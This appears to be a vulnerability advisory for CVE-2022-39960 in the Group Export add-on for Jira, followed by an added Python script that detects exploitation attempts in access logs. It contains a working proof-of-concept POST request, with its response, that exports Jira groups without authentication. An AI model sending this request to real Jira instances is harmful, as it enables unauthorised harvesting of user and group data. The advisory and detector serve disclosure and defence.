CVE-2022-39960: Unauthenticated Group Export for Jira < 1.0.3
The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.
Unauthenticated Group Export for Jira < 1.0.3
Vulnerability Type: Unauthenticated Group Export
Vendor of Product: Atlassian Jira
Affected Product Code Base: Group Export for Jira
Product Version: < 1.0.3
Description: Group Export for Jira versions before 1.0.3 allow an unauthenticated user to export the groups from the Jira instance.
Attack Vectors: An attacker could make an HTTP request to the affected endpoint and obtain the list of Jira groups present.
Attack Type: Remote
Endpoint: /plugins/servlet/groupexportforjira/admin/json
Assigned CVE-ID: CVE-2022-39960
Steps To Reproduce
1. Issue an HTTP POST request to the following endpoint: https://<jira.example.com>/plugins/servlet/groupexportforjira/admin/[format]
2. Send the following as the HTTP POST data: “groupexport_searchstring=&groupexport_download=true”
#PoC
[REQUEST]
POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
Host: jira.example.local
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

groupexport_searchstring=&groupexport_download=true

[RESPONSE]
HTTP/1.1 200
X-AREQUESTID: 996x459x1
Referrer-Policy: strict-origin-when-cross-origin
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: sandbox
Strict-Transport-Security: max-age=31536000
Set-Cookie: atlassian.xsrf.token=B2KZ-BVLZ-WLZO-E635_0caad26e8df61a1995bb595e1e00d6f869571707_lout; Path=/
X-AUSERNAME: anonymous
Content-Disposition: attachment; filename="jira-group-export-41178cce-e033-4f0a-bfad-c909e2435c5d.json"
Vary: User-Agent
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 815

{"jiraGroupObjects":[{"groupName":"jira-administrators","jiraGroupApplicationRoleObjects":[{"name":"Jira Software"}],"users":1, [REDACTED]}]}
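
Detection (added example, not part of the original advisory or the add-on's code): the script below scans access-log lines for anonymous requests to the servlet path above and separates successful exports (POST answered with 200) from other probes. The log layout, the function names and the sample lines are assumptions constructed for illustration; adapt the regular expression to the access-log pattern of your own instance.

```python
import re
from urllib.parse import unquote

# Servlet path from the advisory; the final segment is the export format.
EXPORT_PATH = "/plugins/servlet/groupexportforjira/admin/"

# Assumed layout (adapt to your access-log pattern):
#   client_ip request_id username [time] "METHOD URI PROTO" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<req_id>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
ANONYMOUS = {"-", "anonymous"}

def normalise(uri):
    """Drop the query string, decode %-escapes, collapse '//' and lowercase."""
    path = unquote(uri.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def find_unauthenticated_exports(lines):
    """Return one finding per anonymous request to the group-export servlet."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["user"] not in ANONYMOUS:
            continue  # unparsable line, or an authenticated user
        # 'in' rather than startswith: Jira may run under a context path.
        if EXPORT_PATH not in normalise(m["uri"]):
            continue
        exported = m["method"] == "POST" and m["status"] == "200"
        findings.append({
            "verdict": "export" if exported else "probe",
            "ip": m["ip"], "time": m["time"], "request_id": m["req_id"],
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
        })
    return findings

# Constructed sample lines (documentation IP ranges, invented ids and times).
SAMPLE_LOG = [
    '203.0.113.7 1x1x1 - [12/Sep/2022:10:00:01 +0000] "POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1" 200 815',
    '198.51.100.4 2x2x1 alice [12/Sep/2022:10:01:10 +0000] "POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1" 200 815',
    '203.0.113.9 3x3x1 - [12/Sep/2022:10:02:44 +0000] "POST /jira//plugins/servlet/groupexportforjira/admin/json HTTP/1.1" 302 -',
    '192.0.2.10 4x4x1 - [12/Sep/2022:10:03:02 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in find_unauthenticated_exports(SAMPLE_LOG):
        print(finding)
```

An "export" finding means group data left the instance without a login and the source address and time window should be reviewed; a "probe" finding with a redirect or error status is what a fixed (1.0.3 or later) or otherwise protected instance is expected to show.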